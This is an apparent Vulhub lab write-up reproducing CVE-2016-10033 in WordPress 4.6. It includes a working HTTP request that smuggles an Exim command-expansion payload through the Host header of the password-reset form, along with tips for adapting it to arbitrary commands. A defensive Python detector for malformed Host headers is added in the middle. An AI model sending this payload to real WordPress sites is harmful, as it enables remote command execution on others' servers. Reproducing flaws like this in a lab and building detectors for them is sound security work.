Vulhub vulnerability reproduction 74: WordPress
2022-07-06 00:58:00 【Revenge_ scan】
CVE-2016-10033: WordPress 4.6 arbitrary command execution vulnerability (PwnScriptum)
Vulnerability principle
Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
Test environment
Target range: 192.168.4.10_ubuntu
Build and run the test environment:
```
docker-compose build
docker-compose up -d
```
MySQL initialization takes some time, so please wait. Once the environment is running, visit `http://your-ip:8080/` to open the site. After you initialize the administrator username and password, the site is ready to use (the database is already configured, and it will not be automatically updated).
Testing and exploit use
Send the following request:
```
POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any [email protected] -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
wp-submit=Get+New+Password&redirect_to=&user_login=root
```
As a result, `/tmp/success` is created successfully.
In practice, however, there are still some pitfalls. Specifically:
1. The executed command cannot contain many special characters, such as `:` and quotation marks.
2. The command is converted to lowercase.
3. The command requires an absolute path.
4. You need to know the username of an existing user.
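The request above carries its payload in the `Host` header, so a defender-side check can flag password-reset POSTs whose `Host` value is not a syntactically valid `host[:port]`. This is an added example, not part of the original post; the function names and the two sample requests are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# host[:port]: DNS name, IPv4 literal or bracketed IPv6 literal, optional port.
VALID_HOST = re.compile(
    r"^(?:\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9](?:[A-Za-z0-9.-]{0,253}[A-Za-z0-9])?)"
    r"(?::\d{1,5})?$"
)

# Constructed samples; the second Host value is an inert placeholder, not a payload.
BENIGN = ("POST /wp-login.php?action=lostpassword HTTP/1.1\r\n"
          "Host: blog.example.test:8080\r\n"
          "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
          "user_login=alice")
SUSPECT = BENIGN.replace("blog.example.test:8080",
                         "blog.example.test(any PLACEHOLDER null)")

def parse_request(raw):
    """Return (method, target, headers) from the head of a raw HTTP/1.x request."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers

def inspect(raw):
    """Return a list of findings; an empty list means nothing suspicious."""
    method, target, headers = parse_request(raw)
    host = headers.get("host", "")
    findings = []
    if not VALID_HOST.match(host):
        findings.append("host-not-a-hostname")
    if re.search(r"[\s(){}$]", host):
        findings.append("host-has-shell-or-expansion-chars")
    url = urlsplit(target)
    is_reset = (method == "POST" and url.path.endswith("/wp-login.php")
                and parse_qs(url.query).get("action") == ["lostpassword"])
    if findings and is_reset:
        findings.append("password-reset-with-bad-host")
    return findings

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, inspect(req))
```

The same validation belongs at the reverse proxy or virtual-host layer, so that requests with a malformed `Host` never reach the application.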
Exploit
Reproduce using msf